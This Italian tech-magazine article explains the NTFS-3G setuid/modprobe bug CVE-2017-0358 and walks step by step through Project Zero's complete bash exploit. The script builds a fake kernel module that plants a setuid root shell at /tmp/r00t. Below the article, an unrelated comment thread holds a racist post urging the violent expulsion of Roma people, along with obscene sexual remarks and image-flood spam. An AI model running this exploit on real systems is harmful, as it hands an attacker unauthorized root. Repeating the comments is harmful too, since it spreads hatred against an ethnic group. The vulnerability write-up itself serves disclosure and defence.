PI Debug/ NTFS-3G, privilegi scalati

Su GNU/Linux è possibile montare partizioni Windows usando il modulo FUSE NTFS-3G. Ma un bug, che permette l'esecuzione di un terminale con privilegi di root, trasforma un semplice utente in amministratore

Per quanto un utente GNU/Linux voglia mantenere le distanze dalle tecnologie basate su Windows, prima o poi finirà sempre per doverci fare i conti. Ciascuno di noi ha un amico che usa Windows e che utilizza delle pendrive per passarci dei file importanti. Uno dei file system storici è il FAT, ma il file system NTFS è ormai molto diffuso sia per hard disk pendrive di dimensioni superiori a 32 GB. È probabilmente per questo motivo che uno degli strumenti provenienti dall’universo Microsoft più popolari nel mondo GNU/Linux è NTFS-3G , il modulo FUSE che permette l’accesso ai dispositivi di memorizzazione formattati con NTFS. Il meccanismo di FUSE è molto intelligente, perché lavorando nello userspace invece che nel kernelspace permette il montaggio di file system anche agli utenti comuni e non solo all’utente root. Si tratta, quindi, di un sistema più sicuro, e anche più flessibile visto che si possono inventare file system virtuali di qualsiasi tipo. Tuttavia, il modulo fuse del kernel Linux deve essere caricato.

Un’azione inutile
Sui sistemi dotati di NTFS-3G viene fornito un programma, solitamente /bin/ntfs-3g , che permette l’utilizzo di dispositivi formattati con l’NTFS. E siccome per montarli sul proprio sistema è necessario che FUSE sia abilitato, il programma provvede a caricare tale modulo di sistema chiamando il comando modprobe (lo stesso, per capirci, che si usa per caricare qualsiasi altro modulo di sistema come quelli per i driver delle periferiche).
Il fatto è che questa operazione è nella maggioranza dei casi inutile: oggi come oggi, tutte le distribuzioni che supportano NTFS-3G hanno il modulo FUSE già caricato nel kernel. Insomma, sarebbe sufficiente controllare se il modulo sia caricato e, in caso contrario, rifiutarsi di avviare il montaggio della partizione NT. Ma il vero problema è che non soltanto questa operazione è inutile, ma anche pericolosa. Proprio perché non era previsto che questi strumenti venissero usati in questo modo, non era garantito che funzionassero correttamente. Ed infatti c’è un piccolo intoppo nel meccanismo: il programma che si occupa di NTFS-3G viene eseguito con privilegi di utente semplice, ma se questi vuole a sua volta caricare il modulo fuse nel kernel usando il comando modprobe, avrà bisogno di privilegi di amministrazione. Quindi, il programma usa setuid , il meccanismo che permette a specifici programmi considerati “affidabili” di poter eseguire azioni di root anche quando avviati con i privilegi di utenti normali. Il comando modprobe non è progettato per essere eseguito da setuid, ma soltanto dal vero utente root, ed utilizza una variabile d’ambiente per memorizzare delle opzioni da eseguire assieme al comando. Ciò significa che un malintenzionato potrebbe modificare tale variabile nell’ambiente dell’utente “semplice”, e poi avviare ntfs-3g forzando il caricamento del modulo fuse con modprobe, andando quindi ad eseguire ciò che vuole con privilegi di root (cioè quelli concessi a modprobe grazie a setuid). È quindi possibile ottenere di fatto i privilegi di amministrazione, però ricordiamo che non è un problema di modprobe: è un problema di ntfs-3g, che utilizza modprobe in modo improprio.


La prima versione dell’exploit presentato dai ricercatori di Project Zero

L’exploit
Per capire meglio come si possa sfruttare questo bug , vediamo un semplice exploit presentato dai ricercatori di Project Zero:

#!/bin/bash
echo "[*] Gathering environment info..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"

Prima di tutto il pirata ha bisogno di conoscere l’ambiente in cui si sta eseguendo lo script, in
particolare per quanto riguarda la versione attuale del kernel e la cartella in cui è aperto il terminale al momento.

echo "[*] Creating kernel hijack directories..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko

Conoscendo queste informazioni, diventa possibile creare dei link simbolici al modulo fuse, così da caricare non l’originale ma il link nel kernel usando modprobe .

echo "[*] Pulling in deps... "
echo "[*] Building kernel module... "
cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>

Sfruttando cat è possibile ora scrivere un file sul disco contenente un programma C che rappresenterà un finto modulo da caricare nel kernel per permettere al pirata di eseguire il codice che vuole.

MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");

Se si è arrivati a questo punto, è ovvio che l’attacco abbia funzionato, quindi il sistema è vulnerabile e si avvisa l’utente della necessità di aggiornare.

char *envp[] = { "HOME=/tmp", NULL };
char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
return 0;
}

È possibile preparare una serie di stringhe che contengono il necessario per lanciare un terminale /bin/sh . Infatti, l’eseguibile di questo terminale viene copiato nella posizione /tmp/r00t e gli viene impostato il suid ( chmod u+s ), che garantisce all’utente attuale i privilegi del proprietario di tale file (che è ovviamente root).

void cleanup_module(void) {
printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading...\n");
}
EOF

Il modulo per l’exploit si chiude con una funzione che segnala la disattivazione del modulo del kernel.

cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF

È ovviamente necessario un Makefile per compilare agevolmente il modulo del kernel appena scritto.

make 1>/dev/null 2>/dev/null || echo "[-] FAILED: your need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin". || echo "[-] FAILED: linux-image location non-default?"

La compilazione viene avviata proprio con make, inviando l’output a /dev/null , così non riempie il terminale.

MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null 1>/dev/null 2>/dev/null

Ora si può impostare la variabile d’ambiente modbprobe_options , che contiene le opzioni con cui lanciare modprobe. Da notare che questa variabile è stata impostata nell’ambiente attuale, cioè quello dell’utente “semplice”, che è quello che sta eseguendo lo script bash. La variabile, tuttavia, permette di dirottare l’esecuzione di modprobe sul modulo di sistema che è appena stato scritto (modificando la cartella in cui cercare i moduli con l’opzione -d ), invece che sul vero e proprio modulo fuse “originale” quando il programma ntfs-3g lo richiede.

/tmp/r00t -c 'whoamì | egrep -q 'root' && echo "[+] SUCCESS: You have root. Don't be evil:)"
/tmp/r00t
echo << 'EOF'

Infine, lo script verifica se sia possibile accedere al terminale /tmp/r00t con privilegi di amministrazione, e poi lancia proprio questo terminale offrendo al pirata una riga di comando eseguita come utente root (che è il proprietario del programma).

La soluzione
Il bug è presente nelle versioni di ntfs-3g fornite nella maggioranza delle principali distro GNU/Linux, da Debian ad Ubuntu ma anche Gentoo, Red Hat, SuSE e Mageia. Al momento in cui scriviamo il bug è già stato corretto, perché è stato scoperto dai ricercatori del Project Zero di Google, i quali segnalano il bug in via riservata agli sviluppatori del software e lo rendono pubblico soltanto 90 giorni dopo, proprio per dare ai programmatori il tempo di realizzare una patch prima che l’exploit diventi di dominio pubblico. E tre mesi sono stati più che sufficienti, visto che gli sviluppatori di NTFS-3G hanno provveduto immediatamente a correggere il programma togliendo l’inutile e pericolosa azione. Ovviamente, è fondamentale aggiornare immediatamente il proprio sistema operativo almeno con i “security updates”.


Il bug colpisce molte distro, ma è già stato corretto nelle ultime versioni

AVVERTENZE
Le informazioni contenute in questo articolo sono state pubblicate a scopo puramente didattico , per consentire ai lettori di conoscere e imparare a difendersi dai pericoli a cui sono esposti navigando in Internet o in generale utilizzando applicazioni affette da vulnerabilità.
L’editore e la redazione non si assumono responsabilità alcuna circa l’utilizzo improprio di tali informazioni , che possa avere lo scopo di violare la legge o di arrecare danni a terzi. Per cui, eventuali sanzioni economiche e penali saranno esclusivamente a carico dei trasgressori.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • Risposta alla notizia scrive:
    Proteggiamo i bambini dagli ZINGARI
    Questi rumori animaleschi sono la prova inconfutabile che gli zingari sono ANIMALI. Andiamoli a prendere uno per uno, baracca per baracca, e scaraventiamoli fuori dall'Italia a calci in XXXX. 8)[yt]A8oFnHjK9O0[/yt]
  • su no mi scrive:
    male, molto male...
    ...questa faccenda del machine learning per automatizzare il filtro dei commenti sui siti.La morsa della censura si stringe sempre più, ed incredibilmente c'è sempre e solo una causa, che ormai è diventata una giustificazione per ogni cosa: la sicurezza.Viviamo in un mondo di pecore dominato da pochi pastori, lo sappiamo già, ma vedere come le peecore si fanno prendere per i fondelli è veramente triste.
  • butta la pasta scrive:
    gesù sta arrivando
    [img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img][img]http://dummyimage.com/1x9999/000000/ffffff.png[/img]
  • Nome e cognome scrive:
    ...
    Ma Biagio oggi avrà fatto la XXXXX?
    • ___ scrive:
      Re: ...
      l'ho sentito su whatsapp, era andato con pinuccio a fare un tour dei cessi dei centri commerciali.
      • emanuele diocane scrive:
        Re: ...
        - Scritto da: ___
        l'ho sentito su whatsapp, era andato con pinuccio
        a fare un tour dei cessi dei centri
        commerciali.Confermo, questi due XXXXXXX sono entrati nel bagno di Auchan e si sono messi a XXXXXX nel XXXXX di fianco al mio, io mi stavo tirando una XXXX e sono dovuto scappare dalla puzza, con l'uccello ancora duro che non stava nei pantaloni. Poi per fortuna è diventato molle, ma XXXXX mi sono bagnato un pò le mutande di XXXXXX, comunque ho poi finito di XXXXrmi nel bagno di un Unieuro, venendo sul muro.
  • Pensieroso scrive:
    Punto Informatico
    Per me non funziona su PI questo robot.......
    • panda rossa scrive:
      Re: Punto Informatico
      - Scritto da: Pensieroso
      Per me non funziona su PI questo robot.......E' stato terminato dal T-1000[img]http://images.fanpop.com/images/image_uploads/t-1000-terminator-297954_366_260.jpg[/img]
  • rudy scrive:
    antispam e felici tutti!
    vero, il livello dei commenti e' spesso oltre il tollerabile, offensiva x chi ci sta dento, perlomeno noia per chi se ne "sta fuori". ma ci vorrebbe un antispam, se vuoi vai a leggere, e non censura preventiva automatica. magari "decriminalizzata": i messaggi definiti spam non si possono nemmeno considerare offensiavi o calunniosi, e' libera spazzatura..cosi felici tutti!
  • obelisk scrive:
    babini, genitori e adulti
    Siamo sempre più bambocci guidati da genitori che pensano loro a tutto.E' bello essere deresponsabilizzati e guidati, finché siamo bambini.Da adulti è insopportabile.Ma di adulti in giro ce ne sono sempre meno.
    • emanuele diocane scrive:
      Re: babini, genitori e adulti
      Tu che sei adulto, responsabilizzato ed istruito, mi dici se è normale farsi più di 5 seghe al giorno? Perchè per me è la normalità.
  • kulkan scrive:
    filtriamo, filtriamo
    Non c'è fine al peggio...
  • Hopf scrive:
    Bravi (loro)
    altri diversamente furbi che lavoreranno gratis per Google!
  • ... scrive:
    Meno commenti = meno traffico sul sito
    "Meno commenti significa però meno traffico sul sito".e questo in redazione lo sapete bnissimo :-) se non fosse per i troll che fanno traffico, avreste chiuso baracca e burattini da anni, ecco perche proteggete, fomentate e coccolate i vari maxsix, con gente come quella, il taffico e' assicurato. certo la quatita' del sito va in XXXXX, ma chi se ne frega, l'importante e' piazzare gli spazi pubblicitari. a quando la foto scollacciata in stile tabloid inglese?
    • Perspective scrive:
      Re: Meno commenti = meno traffico sul sito
      - Scritto da: ...
      "Meno commenti significa però meno traffico sul
      sito".
      e questo in redazione lo sapete bnissimo :-) se
      non fosse per i troll che fanno traffico, avreste
      chiuso baracca e burattini da anni, ecco perche
      proteggete, fomentate e coccolate i vari maxsix,
      con gente come quella, il taffico e' assicurato.
      certo la quatita' del sito va in XXXXX, ma chi se
      ne frega, l'importante e' piazzare gli spazi
      pubblicitari. a quando la foto scollacciata in
      stile tabloid
      inglese?Toxic content ratio: <b
      0.9 </b
    • aphex_twin scrive:
      Re: Meno commenti = meno traffico sul sito
      - Scritto da: ...
      "Meno commenti significa però meno traffico sul
      sito".
      e questo in redazione lo sapete bnissimo :-) se
      non fosse per i troll che fanno traffico, avreste
      chiuso baracca e burattini da anni, ecco perche
      proteggete, fomentate e coccolate i vari maxsix,
      con gente come quella, il taffico e' assicurato.
      certo la quatita' del sito va in XXXXX, ma chi se
      ne frega, l'importante e' piazzare gli spazi
      pubblicitari. a quando la foto scollacciata in
      stile tabloid
      inglese?La qualitá va in XXXXX a causa dei commenti di maxsix ? Sei etype vero ? (rotfl)
      • Sg@bbio scrive:
        Re: Meno commenti = meno traffico sul sito
        Ci sono vari utenti che con le loro ossessioni, hanno certamente reso poco fertile questo posto.
    • pix scrive:
      Re: Meno commenti = meno traffico sul sito
      - Scritto da: ...
      "Meno commenti significa però meno traffico sul
      sito".
      e questo in redazione lo sapete bnissimo :-) se
      non fosse per i troll che fanno traffico, avreste
      chiuso baracca e burattini da anni, ecco perche
      proteggete, fomentate e coccolate i vari maxsix,
      con gente come quella, il taffico e' assicurato.
      certo la quatita' del sito va in XXXXX, ma chi se
      ne frega, l'importante e' piazzare gli spazi
      pubblicitari. a quando la foto scollacciata in
      stile tabloid
      inglese?Chissà che traffico? (newbie) In pratica scrivono più che altro sempre i soliti 4 o 5, visto che fra troll (troll2), bulletti da tastiera :@, fanatici (win)(linux)(apple), provocazioni :p e cavolate illogiche :, la gente si stufa e se ne va, così restano solo quelli lì, a parte qualcuno che ogni tanto fa un giro per farsi una risata (sì, hanno pure le faccine apposta per tutte queste cose (geek) ). E a parte lo scrivere, poi non leggono più neanche i commenti spazzatura. Il flame e la polemica può generare traffico entro certi limiti, ma alla lunga diventa controproducente, in un modo o nell'altro. PI comunque è così e ha traffico anche dalle notizie (sì, non tutti leggono solo il titolo :D).
    • Sg@bbio scrive:
      Re: Meno commenti = meno traffico sul sito
      Se vogliamo essere schietti, il numero di commenti è drasticamente basso rispetto al passato di PI (pre edizioni master), non hanno mai voluto prendere seriamente in considerazione una moderazione bilanciata con il rispetto della libertà degli utenti. Infatti moltissimi utenti storici sono spariti da anni per via di come il forum e lo spazio commenti, siano diventati un XXXXX.
      • emanuele diocane scrive:
        Re: Meno commenti = meno traffico sul sito
        Come dici tu in questo forum c'è libertà, quindi comunico a tutti che mi sono appena fatto una XXXX pensando ad una collega di lavoro molto topa che non mi caga di striscio. Uhauhauhauha!
        • ... scrive:
          Re: Meno commenti = meno traffico sul sito
          - Scritto da: emanuele diocane
          Come dici tu in questo forum c'è libertà, quindi
          comunico a tutti che mi sono appena fatto una
          XXXX pensando ad una collega di lavoro molto topa
          che non mi caga di striscio.
          Uhauhauhauha!posta la foto della collega:P
Chiudi i commenti